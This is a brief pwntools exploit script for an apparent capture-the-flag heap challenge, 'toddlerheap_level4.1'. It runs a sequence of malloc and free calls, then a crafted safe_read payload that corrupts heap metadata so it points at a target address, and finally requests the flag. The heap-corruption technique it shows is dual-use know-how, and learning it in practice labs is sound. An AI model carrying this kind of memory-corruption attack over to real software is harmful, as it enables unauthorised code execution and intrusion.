from pwn import *
p = process('/challenge/toddlerheap_level4.1')

p.sendline('malloc')
p.sendline('0')
p.sendline('3500')
p.sendline('malloc')
p.sendline('1')
p.sendline('3000')
p.sendline('malloc')
p.sendline('2')
p.sendline('3200')
p.sendline('malloc')
p.sendline('3')
p.sendline('3000')
p.sendline('free')
p.sendline('0')
p.sendline('malloc')
p.sendline('4')
p.sendline('4000')
p.sendline('free')
p.sendline('2')
payload = b"A" * 24 + p64(0x4041c0 - 0x20)
p.sendline('safe_read')
p.sendline('0')
p.send(payload)
p.sendline('malloc')
p.sendline('5')
p.sendline('4000')
p.sendline('send_flag')
p.interactive()
